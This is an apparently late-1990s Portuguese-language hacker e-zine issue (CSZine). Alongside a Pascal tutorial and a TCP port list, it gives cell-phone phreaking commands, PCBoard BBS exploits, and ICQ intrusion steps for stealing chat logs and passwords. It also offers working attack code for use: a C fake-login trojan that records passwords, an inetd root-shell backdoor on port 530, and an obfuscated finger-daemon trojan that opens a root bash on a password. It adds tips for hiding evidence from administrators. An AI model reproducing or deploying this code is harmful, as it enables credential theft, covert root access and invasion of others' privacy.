zZZZZZZZZZZZZZZZz zZ cCCCCCCCCc sSSSSSSSSs zZ cCCCCCCCCCCCCc sSSSSSSSSSSSSs zZ cCCC CCCCc sSSS SSSSs zZ cCCCc SSSSs zZ II NNn NN EEEEE CCCCC SSSSSSSSSSs zZ II NNNn NN EE CCCCC SSSSSSSSSs zZ II NN NnNN EEEE CCCCC SSSSS zZ II NN NNN EE CCCC CCCCc sSSSS SSSS zZ II NN NN EEEEE CCCCCCCCCCCCCC SSSSSSSSSSSSSS zZ CCCCCCCCCC SSSSSSSSSS zZ zZ zZ zZZZZZZZZZZZZZZZZz PS: Se você não conseguiu lêr direito, aí em cima tah escrito CSZine. Novo E-Mail da revista : cszine@hotmail.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=Cheat=Struck-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introdução: A maioria das pessoas que leêm a zine sempre pulam a introdução (a parte chata), por isso eu decidi que ela não será mais uma seção da zine, as- sim como a preview. Em compensação, agora o bonus que sempre vinha no final da zine(escondidinho) será uma seção, a ultima. A revista continua com 10 seções, garantindo o mantimento da Invasão de privacidade, VIRII, Hack - the art, Phreaking e bugz. Se você acha que a zine poderia ter uma seção de Anarchy ou qquer outra coisa que você goste, me escreva uma matéria para ser publicada, que talvéz assim você consiga dar a iniciativa que falta para os outros. Não precisam ter medo de me escrever. Eu vou apenas avaliar a sua ma- téria e então publicarei-a(se gostar). Não irei xingar a mãe de ninguém, nem te floodar, nukar, queimar seu modem, nem fazer qquer outra ameaça dessas que apenas lamers fazem. Se você quer saber se a matéria será publicada, apenas espere e veja se ela saiu na mais recente edição. Estou fazendo um novo e-mail apenas para os caras que querem falar sobre a revista, e tb construindo uma nova page na geocities(vamo vê se dessa vez dura). Por enquanto me contatem no irc.via-rs.com.br, #CSCHANNEL. -=-=-=-=-=-=-=-=-=-=--=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Indice Seção: Matéria: Assunto: Autor: Nota: 1. Phreaking Telefonia celular Cheat Struck 10,0 2. Bugz Bugz para PCboard Anonymous 10,0 3. Programação Tutorial de pascal Cheat Struck 9,5 4. Virii Trojam para UNIX Cheat Struck 9,5 5. NeWs Noticias Quentissimas Cheat Struck 8,5 6. Invasão de privacidade Invasão via ICQ Cheat Struck 9,5 7. Vivendo Boliche de graça Cheat Struck 9,5 8. Crackerz Mexendo no mIRC Cheat Struck 9,0 9. Hack, the Art Backdoor's novissimas Cheat Struck 10,0 10. ¡Bonus! Serviços do TCP Cheat Struck 9,0 ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 1. Phreaking ####################################################### $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# Bem alunos: Vamos revêr o que vimos aula passada?? Tentamos entender direitinho como funciona os canais nas conversas telefonicas e descobrimos como entrar em um canal que esta sendo usado por 1 outra pessoa. Nessa aula veremos como dominar o canal. Para vêr o status do canal digite o comando 02# . Isso irá mostrar: XXX YYY Onde XXX é o numero decimal do canal. YYY é a leitura RSSI do canal. Aperte * para ver os próximos dados. Aparecerá algo tipo: 1100001 Agora vamos entender o que significa: 1 1 0 0 0 0 1 | | | | | | | | | | | | | +----->transmissor de audio mudo. | | | | | | | | | | | +----->receptor de audio ligado. | | | | | | | | | +----->Modo do canal(voice). | | | | | | | +----->Nível de força maxima. | | | | | +----->Tone desligado. | | | +----->CARRIER ligado. | +----->6Mhz de frequencia SAT. Iremos nos consentrar nesse segundo menu de dados. Tecle # p/ sair. As configurações iniciais do seu celular são: 3000111 Ou seja: 3 0 0 0 1 1 1 | | | | | | | | | | | | | +----->transmissor de audio mudo. | | | | | | | | | | | +----->receptor de audio mudo. | | | | | | | | | +----->modo do canal(control). | | | | | | | +----->Nível de força maxima. | | | | | +----->Tone desligado. | | | +----->CARRIER desligado. | +----->sem frequencia SAT. Agora, como nós mudamos essas configurações???????? Calma coelhinho. Vamos por parte: 1. Como mudar a frequencia SAT???? Isso é algo extremamente importante nos EUA e outros paises que usam CT's digitais(no Brasil é usado CT's eletro-mecanicas). Se um phreaker conseguir enviar uma frequencia exata de 2,6Mhz consiguirá realizar a maior façanha phreak, ou seja obterá o resultado da Blue Box. Você não poderá realizar essa façanha usando apenas o celular. O mais próximo que vc poderá conseguir é 2610Hz de frequencia SAT porém p/ a bluebox funcionar terão que ser 2600Hz cravados. Para descobrir como confi- gurar a fase SAT procure pelo comando 52# ou 25# nas edições anteriores da csz. 2. Como ligar e desligar o carrier???? O comando 05# liga o transmissor de carrier e o 06# desliga. 3. Como ligar/desligar o tone???? O comando 15# desligará o tone e o 14# obterá 10KHz de tone. Para ativar o high tone use 28# e para desativar use 29#. Para ativar o low tone use 30# e para desativar use o 31# 4. Como mudar o nível de força??? Use o comando 12*# , onde o * pode variar de 0 à 7. 0 é a força maxima e 7 é a força minima. A força maxima coresponde a 3Watts. 5. Como mudar o modo do canal???? Para mudar o modo do canal para voice use o comando 17# e para mudar para control use 16#. 6. Como ativar/desativar o receptor de audio??? O comando 07# deixa o receptor mudo e o 08# ativa-o. 7. Como ativar/desativar o transmissor de audio??? O comando 09# deixa desliga e o 10# liga-o. Atenção! É fundamental que o transmissor esteja desligado, caso contrario as pessoas que estiverem conver- sando no canal notaram ruídos ou as suas falas. Bom amiguinhos, a aula por hoje está acabando. Se vc quer saber como tira os maluco dos canais ou qquer outra coisa phreaker desse tipo, faça uma BlueBox e viage para os Estados Unidos. :¬) ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 2. Bugz ############################################################ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# -=-==--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= Bugz para PCBoard -=-=-=-=--=-=-=-=-==--=-=-=-=-==-=-=-=-=-=-=-==-=-==-=-=-==-=-=-==-=-=--=-=-= Antes de começar a descrever os bugs, gostaria de explicar algo meio que incrivel no PCBoard: a estrutura de BATCH é falha, pois todo arquivo que você vai retirar ou jé está marcado para retirar, cai numa lista. O PCB é 'burro' no ponto de vista de seleção dos arquivos. Tais como pacotes qwks, reps, ups, arquivos de dir. e blts... BUG #1: Macros podem ser usadas mesmo sem nivel de SysOP. O PCBoard possui algumas macros, tais como @cls@, @alias@, no entanto , estas são relativamente pertencentes somente a usuarios com nivel de SysOP (setado no pcbsetup, 'minimum sec. for sysop'). Mas você pode usar estas macros! Ao usar o comando D ou U, experimen- te digitar no lugar do nome do arquivo @who@, ou @user@, isto pode ser util em BBSs que não permitem estes comandos. Outro detalhe: imaginou se colocar um @pos@ e chamar um PPE, que disastre seria?! Hummm... BUG #2: Downloads sem usar o comando D. Você pode fazer downloads sem ter acesso ao comando D, basta fazer o seguinte: ao inves de flagear um arquivo para download no modo padrao, tipo FLAG ou com a barra de espacos, use o comando: L *.* 1 D NS Onde... L: Procura de arquivos *.*: Todos os arquivos 1: Area D: Retira os arquivos encontrados NS: NonStop Você pode modificar a parte acima, conforme o seu interesse. Bom, a- gora continuando... Se você der o comando D, os arquivos estarão marcados... Mas como se você não pode fazer o download?! Esqueceram que o PCBoard tem uma pessima estrutura de BATCH de files? Tudo o que você guarda fica no mesmo BAT. De agora em diante, você tem duas saidas para pegar estes arquivos: R L QW = Voce vai pegar um pacote QWK com as ultimas msgs... Só que este pa- cote seria mais 1 arquivo no batch, resumindo, você recebe o pacote QWK mais os arquivos anteriormente marcados. B D A = No caso do BBS permitir download de boletins, você pega os boletins mais os arquivos marcados. BUG #3: Falha na verificacao de tempo ao marcar arquivos. Se você marcar arquivos pela forma descrita acima, com o comando L, você vai estar 'dizendo' ao PCBoard: "olha sistema, quando eu for fazer o download, você me manda estes arquivos!". Ou seja, eles não são marcados ime- diatamente... Se você for dar download e faltar tempo para alguns arquivos, sim- plesmente aborte o d/l (download) no momento em que aparecer: "aborta, conti- nua, goodbye, protocol"... E então, volte para o menu e use o mesmo comando. Quando voce for fazer o d/l novamente, os arquivos já marcados apare- cerão da seguinte forma: "duplicates file..." ou seja, você tentou marcar duas vezes o mesmo arquivo, certo? Acontece que o PCB nao conta o tempo des- tes arquivos duplicados, ou seja, ele vai marcar + xxx arquivos com o tempo restante. Por exemplo: se você tinha 60 minutos e usar este comando por umas 6 vezes, voce pode fazer uma transferencia de 360 min.!!! Belezaaaaa! BUG #4: Portas externas sao 'burras'. Se você entrar no mail, e colocar uma conferencia com bastante mensa- gens e desconectar do BBS no meio, você conecta e está com o seu tempo nova- mente inteiro. Isto se explica pois: o PCB gera um arquivo USERS.SYS ou DOOR.SYS para poder gerar a porta, no retorno, ele le este arquivo e verificar quanto tempo o usuario ficou nesta mesma, subtrai do tempo inicial do usuario antes de entrar na porta e do tempo da conexão. Imagina se você desconectar e o tempo ficar negativo... O PCB é meio que animal e então você fica com o seu tempinho zerado! ehehe =) Não só no mail, tente portas de jogos! Não tem coisa melhor!!! BUG #5: PPEs Se você fizer o upload de um PPE, o uploader não o reprova... No en- tanto, se você chamar o PPE uploadeado usando aquelas macros descritas acima, vc pode executar o PPE na boa e subir seu nível... Eh questão de estudar... -=-=-=-=-=-==-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-==-=-=- Atenção! Os dados acima Não são de minha autoria e não sei quem os escreveu, por isso me referi ao autor como anonymous. O nick dele não é Anonymous. ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 3. Programação ##################################################### $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-==- Tutorial de Pascal (parte 1) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= Vamos pular akela chatice de "Linguagem Pascal" ou "Porq TPascal?" e vamos ao que enteressa. »»»»»»»»»»»»»»» Inicio ««««««««««««««« Essa sempre é a pior parte. Ter que explicar detalhadamente a estru- tura dos programas em java. Então aki vai um exemplo, simples e claro. Este exemplo foi tirado de um tutorial onde o autor não é especificado. Foram tirados alguns detalhes e acressentados outros de minha parte, na fonte original. Antes de ver o exemplo vc deve entender que o programa em pascal se divide em 3 partes importantes: O cabeçalho, a Area de definições e o corpo. --------------------Exemplo.pas---------------------------------------------- { Tudo que estiver entre chaves são comentários e não são levados em conta pelo compilador.} Program Primeiro_Exemplo; { este e o cabecalho do programa } USES Crt; { Aqui estou utilizando uma UNIT, chamada CRT. } {Aki termina o cabeçalho do programa e começa a area de definições } Label { Esta' é a area de definições para labels. Todas as labels q vc usar no programa, devem aparecer aki } Const { Nesta area podemos definir todas as constantes que quisermos utilizar no programa } hoje_é = '4 de outubro de 1998'; Type { Aki é permitido definir novas variaveis } Var { Todas as variaveis pre-definidas que forem usadas no programa devem ser declaradas aki } dia : integer; ano : integer; mes : string[3]; l : integer; Procedure { Nesta area é necessario definir todas as procedures que você for usar mais tarde } Linha; Begin For l:=1 to 80 do Write('-'); end; Function { Aki serão definidos as funções a mais. } { Aqui começa o corpo do programa } { As functions e procedures serão explicados mais tarde } Begin ClrScr; Linha; { Executa a procedure linha(que foi criada a cima } Writeln('Hoje é : ',Hoje_é); Linha; Write('Que o dia vc nasceu(DIA)? '); Readln(dia); Linha; Write('Qual o mes do seu aniversario ? '); Readln(mes); Linha; Writeln('Em q ano você nasceu?? '); Readln(ano); Linha; Write('Good Bye!'); End. --------------------------------Exemplo.pas---------------------------------- »»»»»»»»»»»»»»» Explicação das partes do programa ««««««««««««««« » Cabeçalho: Sempre aparece no topo do programa iniciado pelo comando "program". Tipo: Program novo_projeto; ^^^^^^^^^^^^--Este é um nome pré-fixado no programa. Logo em seguida deve ser indicada a UNIT que serah usada pelo programa. UNIT é uma biblioteca de functions e procedures. O comenado usado deve ser o USES. Tipo: Uses Dos; ^^^--Este é o nome da UNIT q serah usada. » Area de definições: A area de definições é sub-dividida em algumas partes exenciais e outras nem tão importantes. As principais areas foram mostradas no exemplo acima e explicadas. Se você não for usar alguma dessas areas, não precisará indicalas no pro- grama. Tipo a area "Label" não precisaria ter aparecido. » Corpo: O corpo do programa é onde serão indicadas todas as funções que o programa deverah seguir para realizar a sua função. Para marcar o fim do programa use o cmd "End" seguido de um ponto. Tipo: End. »»»»»»»»»»»»» Dados pré-fixados «««««««««««««« As vezes quando você trabalha com variaveis, tem que usa-los. Mas se- rah que vc os conhece bem??? * CHAR = Todos os caracters cherados pelo teclado. * BOOLEAN = True or False. * STRING = Uma palavra Se vc colocar tipo assim: STRING[5] . Isso significa que o valor é uma pa- lavra de 5 caracteres. * SHORTINT = até 3 caracteres(equivale aos sistemas de 8bits) * INTEGER = até 5 caracteres(equivale aos sistemas de 16bits) * LONGINT = até 10 caracteres(equivale aos sistemas de 32bits) * BYTE = 1 a 3 caracteres * WORD = 1 a 5 caracteres Existem mais alguns mas é chato ficar explicando isso por tanto vamos ver alguns exemplos : Var Seu_Nome:STRING; Begin ClrScr; Writeln('Qual o seu nome? '); Readln(Seu_Nome); End. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--= Fim da parte 1 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=- ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 4. Virii ########################################################### $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# Vamos deixar para criar os virus em pascal asim que acabar o tutorial. Por enquanto vamos ver um trojan para UNIX. O que ele faz é simular um login, o cra que executa-lo encontra-rá a seguinte tela: Tiburon Systems 4.2bsd / System V (shark) login: babaca Password: Login Incorrect Aí ele pensa que deve ter digitado a senha errada, digita de novo e entra no sistema. Porém akela senha que ele digitou estava certa e foi grava- da em um de seus arquivos. Note que este trojam é para um sistema bsd4.2, al- tere as primeiras linhas da fonte(antes de compila-la) para o seu sistema. Use os seguintes cmds para compila-lo: cc horse.c -lcurses -ltermcap mv a.out horse Agora crie um arquivo chamado trap e coloque esses comandos: horse login Para executar o trap digite: source trap Agora atualmente veja o file stuff no seu diretório home. Copie-os e depois delete o file. Ele pode ser muito incriminante se o root le-lo. Se você entende de C, pode alterar a fonte como preferir. Porém se vc não sabe nada de C, não mexa aí que vc vai fazer merda! Essa fonte não fui eu quem fiz, mas funciona legal. ----------horse.c------------------------------------------------------------ /* A mensagem abaixo deve ser alterada para se parecer com a mensagem que * o sistema imprime quando pronto. Cada \n representa um carriage return */ define SYSTEM "\n\nTiburon Systems 4.2bsd UNIX (shark)\n\n" define LOGIN "login: " define PASSWORD "password:" define WAIT 2 define INCORRECT "Login incorrect.\n" define FILENAME "stuff" include include int stop(); main() { char name[10], password[10]; int i; FILE *fp, *fopen(); signal(SIGINT,stop); initscr(); printf(SYSTEM); printf(LOGIN); scanf("%[^\n]",name); getchar(); noecho(); printf(PASSWORD); scanf("%[^\n]",password); printf("\n"); getchar(); echo(); sleep(WAIT); if ( ( fp = fopen(FILENAME,"a") ) != NULL ) { fprintf(fp,"login %s has password %s\n",name,password); fclose(fp); } printf(INCORRECT); endwin(); } stop() { endwin(); exit(0); } ----------horse.c------------------------------------------------------------ ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 5. NeWs ############################################################ $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# Noticias Quentes!!!!! _.'^'._.'^'._.'^'._.'^'._ HoMe PaGe Da MoS zInE hAcKeD _.'^'._.'^'._.'^'._.'^ Pois eh! Akeles que se diziam os maiores hackers do mundo, foram hu- milhados publicamente por um hacker chamado sm0g. Para ver a hp hackeada vá ao url members.xoom.com/moszine. A msg colocada no lugar da hp original foi: "Opz.. infelizmente o melhor grupo hacked do pais teve de ser desconectado devido a problemas tecnicos.. Em breve essa pagina vai tambem estar na seção de "Hacked Hosts" da MOS he he... se eles ainda tiverem a moral de continuar essa merda de grupo depois disso.. Entao voces sao os bons? Os melhores do país? Wiz4rd voce acha legal roubar ideia dos outros? Humildade colega.. humildade.. O codigo do B2 (q ta com pau porq eu nao terminei, mas tu é tao otario que nem isso sacou..) é meu. A ideia foi minha.. e vc é uma puta que gosta de aparecer, e pensa que é o maximo.. pois bem, aproveita agora e tenta hackear esse sisteminha d merda, porq eu estou com uma vontade enorme de deixar essa pagina aqui o resto da vida. Bah.. foda-se essa bosta de Masters Of Shadows. sm0g" ._.'^'._.'^'._.'^'._.'^'._.'^'._ CsZiNe TiPs _.'^'._.'^'._.'^'._.'^'._.'^'._. A CSZine fez mais sucesso do que eu imaginei. Por isso estou dando maior atenção a ela. Aki estão os lugares onde vc pode encontrar a CSZine e o autor Cheat Struck(eu): irc.via-rs.com.br #CSCHANNEL = Canal no IRC. 16623675 = UIN do ICQ. cszine@hotmail.com = E-Mail. www.geocities.com/????? = HomePage (Está saindo). _.'^'._.'^'._.'^'._ "ViRuS" GoOd TiMeS cAuSa PrObLeMaS _.'^'._.'^'._.'^'._.'^ Você jah deve ter recebido uma msg ou pego algum arquivo .txt que di- zia carregar um virus chamado Good Times, não? Pois eu jah, e conheço o autor desse 'virus'. O nick do autor é DARK ANGEL, embora eu nunca tenha falado com ele eu jah lí varios de seus textos, inclusive o guia de criação de vírus, o qual mesmo sendo em formato texto puro dizia conter um virus. Faz pouco tempo, acho que no dia 29 de julho deste ano(1998) saiu uma matéria sobre estes virus falsos no caderno de informatica da ZeroHora(eleito o melhor jornal em 1996, acho), e este nome estava citado. Eu não me lembro quantas besteiras ouvi falar que ele faz, não irei citar nenhuma pois posso me confundir com outros virus "falsos". Este "virus"(entre aspas porq não é propriamente um virus) é transmi- tido por e-mail(se vc acredita nisso...) e arquivos com extenção .txt segundo as informações da ZH e diz causar coisas impossiveis de acontecerem. _.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^'._.'^' ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 6. Invasão de privacidade ########################################## $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# -=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Ivasão via ICQ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Esse metodo é direcionado a akeles que ainda usam o ruindows, mas tb funciona no linux. Sigua os passos: 1. Descobrindo o IP: Vá ao prompt do DOS e digite ARP -A 2. Descobrindo a porta: O ICQ usa portas acima de 500. Rode o programa ICQ PORT SNIFF e descubra a porta. 3. Invadindo... Use um programa de telnet e conecte-se ao ip do usuário pela porta q vc detectou. 4. O que fazer lah?? Os arquivos do ICQ que vc pode pegar são os .dat e .idx no sub-dir DB dentro do diretório em que o ICQ foi instalado (normalmente Arquivos de Pro- gramas/ICQ). Lah estaram todas as conversas e dados do maneh. Veja tb se por acaso ele não colocou a senha(DELE) em algum file e/ou se ele seja cadastrado no provedor da IBM procure pelo arquivo REGINFO.TXT no diretório /IBMNET. Vc Também pode mandar virus, etc... Agora se ele estiver usando um s.o. UNIX as coisas ficam + dificeis. -=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 7. Vivendo ######################################################### $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# Lembra dakela matéria que falava como roubar tv a cabo?? Se ele fosse publicado hoje estaria nessa seção. Eehhh... Essa seção não falará sobre computadores ou sobre telefonia, falará sobre os outros aparelhos eletronicos que vc encontra na sua frente e gostaria de saber algo a mais sobre eles. Como não existe nome para a ação de burlar os tróço q aparecem aki e eu não me considero a altura de dar um nome para isso, o nome da seção serah vivendo pelo fato de que agente encontra isso no nosso dia-a-dia. Não tenho muito o que colocar nessa seção, pra falar a verdade soh tenho materia para essa e a próxima edição. Por isso eu gostaria que vocês me mandassem as suas dicas, se quizerem q essa seção continue. Todo mundo desco- bre algo novo nos dias de hoje. -=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jogando boliche de graça -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Essa dica não deve funcionar em todas as makinas de boliche. Descobri ela um dia em que estava jogando boliche com meu pai e meus brothers e ví um daqueles karinhas que cuidam das maquinas, usar esse truque para jogar d gra- ça. Ele funciona assim. Quando a familha que estava no seu lado parar de jogar, espere até surgir uma tela escura, informando o fabricante. Veja se a barra estah limpa(se não tem nenhum dakeles maneh q cuidam das maquinas por perto). Aperte meio de canto o botão de "Split" no canto inferior direito da makina ao lado(a que estah temporariamente desligada). Isso executa um teste na memória da maquina (pelo menos foi isso que o cara me explicou), abaixando os pinos por alguns segundos e depois os reco- lhe novamente e desliga a maquina. Esses segundos são suficiente para vc jogar uma bola. UMA BOLA. Mas faça rapidinho para que ninguem veja. Se algum palhaço o vir fazendo isso po- de te dar um mixão ou acressentar na sua consumação. Descobri esse "truquezinho" nas maquinas KOOP(acho q é isso) do Ame- ricam Bowling do BOURBOM de Porto Alegre. Se não funcionar na sua cidade a unica coisa a fazer é se lamentar por não ter nascido numa cidade tão maneira quanto a minha. -=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 8. Crackerz ######################################################## $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Mexendo no seu mIRC. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- O mIRC é um dos melhores(se não o melhor) programa de IRC jah visto. Porém é muito mole crackea-lo. A algum tempo atraz ( em quanto eu tentava inventar um substituto ba- rato para a agua benta :¬) ) eu jah havia crackeado o mIRC descaradamente. Eu apenas abri o edit e mudei todos os locais que diziam mIRC32 para BitchX. Isso éra apenas para enganar os carinhas que davam version e essas cosas. Você também pode fazer isso. Apenas copie o mIRC32.EXE para um outro diretório com qquer outro no- me. Depois rode o edit e abra-o no modo hexadecimal(edit /70 nome.exe). Se ao edita-lo aparecer a msg "Não é possivel modificar um arquivo somente leitura", veja as seguintes soluçoes: 1. Veja se o programa não está aberto. Se estiver, feche-o. 2. Veja se vc não usou o edit no modo somente leitura. 3. Veja os atributos do arquivo. Agora feche-o e abra-o novamente. Se você for fazer um script para mIRC e quizer alterar o nome do mIRC para o nome do seu script faça o mesmo que eu fiz(descrito acima). Vc também poderá traduzir o seu mIRC. Basta procurar por textos tipo: *** Not connected to server e substitua por: *** Voce nao esta conectado Note que deve ter o mesmo numero de caracteres e não pode ter acentos. Além disso também é possivel trocar o nome dos comandos do mIRC. Tipo "say" pode virar "diz" ou "mode" = "modo" ou "echo" = "acho"(bah). Para fazer essas façanhas no mIRC não é precisso muito conhecimento crackz apenas um editor de texto como o edit do dos e meio neuronio em alpha. Esse truque pode parecer meio troxa pros Kra que jah sabem um pouco de crackz mas eu insisti em não copia materia dos outros zines que falam so- bre crackz. Preciso de kras entendidos no assunto para escrever essa seção. ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 9. Hack, the Art ################################################### $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# Outras BackDoor's. Lembra dakelas backdoors q eu publiquei na edição passada?? Elas são do tipo caras de pau. Quer dizer, se chega um admin esperto na parada ja nota a backdoorzinha e a tranca. Por isso nessa edição da zine vou colocar umas menos, escandalosas. "'"'"'"'"'"'"'" Utilizando serviços experimentais "'"'"'"'"'"'"'"'"' Faça o seguinte: 1. Procure pelo serviço courier no file /etc/services. A linha deve estar assim: courier 530/tcp rpc # experimental Se naum tiver adicione-o. 2. Copie o /etc/bash para o /usr/sbin e renomeie-o para in.couried que eh o nome do arquivo que se estabelece a conexão. Assim: # cp /bin/bash /usr/sbin # mv /usr/sbin/bash /usr/sbin/in.courierd # chmod a+x /usr/sbin/in.courierd 3. Coloque a backdoor assim: courier stream tcp nowait root /usr/sbin/in.courierd -i Dentro do arquivo /etc/inetd.conf. Pronto! Agora de um telnet pela porta 530. Note que vc só copia o /etc/bash para /usr/sbin/in.courierd para en- ganar o admin. Aí não fica akele tróço descarado de: telnet stream tcp nowait root /bin/sh /bin/sh -i '"'"'"'"'"'"'"'" Usando o in.fingerd '"'"'"'"'"'"'"'"'" Aki vai um programa em c para substituir o in.finger. ---------------------------------fingtrojan.c-------------------------------- /* The Fingerd trojan by Hitman Italy * This source cannot be spread without the whole article * but you can freely implement or modify it for personal use * [========================================================] * Modificado por X-SaTaNiC, Kbyte , soft , AnArChY * Devico bugs encontrados que fazia com que naum compilasse e a * backdoor da shell nao executasse direito. * Mas depois de tantas modificacoes esta ai trojan rodando blz! */ static char copyright[] = ""; /* Copyright String */ static char sccsid[] = ""; /* Sccsid String */ #define SENHA "rlz" /* SENHA A SER USADA */ #include #define PATH_FINGER "/usr/bin/finger" /* DIRETORIO DO FINGER, cliente */ #define CODE 161 char *HitCrypt(ch) char *ch; { char *b; b=ch; while ((*(ch++)^=CODE)!=0x00); return(b); } main(argc,argv) int argc; char *argv[]; { register FILE *fp; register int ch; register char *lp; int p[2]; static char exor[4][23]={ {201,200,213,CODE}, {142,196,213,194,142,209,192,210,210,214,197,CODE}, {201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194, 210,201,CODE}, {227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197, 143,143,143,CODE} }; #define ENTRIES 50 char **ap, *av[ENTRIES + 1], line[1024], *strtok(); #ifdef LOGGING /* unused, leave it for "strings" command */ #include struct sockaddr_in sin; int sval; sval = sizeof(sin); if (getpeername(0, &sin, &sval) < 0) fatal(argv[0],"getpeername"); #endif if (!fgets(line, sizeof(line), stdin)) exit(1); av[0] = "finger"; for (lp = line, ap = &av[1];;) { *ap = strtok(lp, " \t\r\n"); if (!*ap){ break;} if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w')) *ap = "-l"; if (++ap == av + ENTRIES) break; lp = NULL; } if (pipe(p) < 0) fatal(argv[0],"pipe"); if (!strcmp(line,SENHA)) { system("/bin/bash -i"); exit(0); } switch(fork()) { case 0: (void)close(p[0]); if (p[1] != 1) { (void)dup2(p[1], 1); (void)close(p[1]); } if (execv(PATH_FINGER, av)==-1) fprintf(stderr,"No local finger program found\n"); _exit(1); case -1: fatal(argv[0],"fork"); } (void)close(p[1]); if (!(fp = fdopen(p[0], "r"))) fatal(argv[0],"fdopen"); while ((ch = getc(fp)) != EOF) { putchar(ch); } exit(0); } fatal(prg,msg) char *prg,*msg; { fprintf(stderr, "%s: ", prg); perror(msg); exit(1); } ---------------------------------fingtrojan.c-------------------------------- 1. Agora compile-o com: cc -o in.fingerd fingtrojan.c 2. Mova-o para o dir /usr/sbin e pronto, agora para entrar como root use o serviço finger(porta 79) do sistema que vc fez a backdoor. ############################################################################# $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ###### 10. ¡Bonus! ######################################################## $$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ ############################################################################# -=-=-=-=-=Serviços do protocolo TCP=-=-=-=-=-=-=- SERVIÇO: PORTA: tcpmux 1 echo 7 discard 9 systat 11 daytime 13 netstat 15 qotd 17 chargen 19 ftp-data 20 ftp 21 telnet 23 smtp 25 time 37 whois 43 domain 53 mtp 57 gopher 70 rje 77 finger 79 http 80 www 80 link 87 kerberos 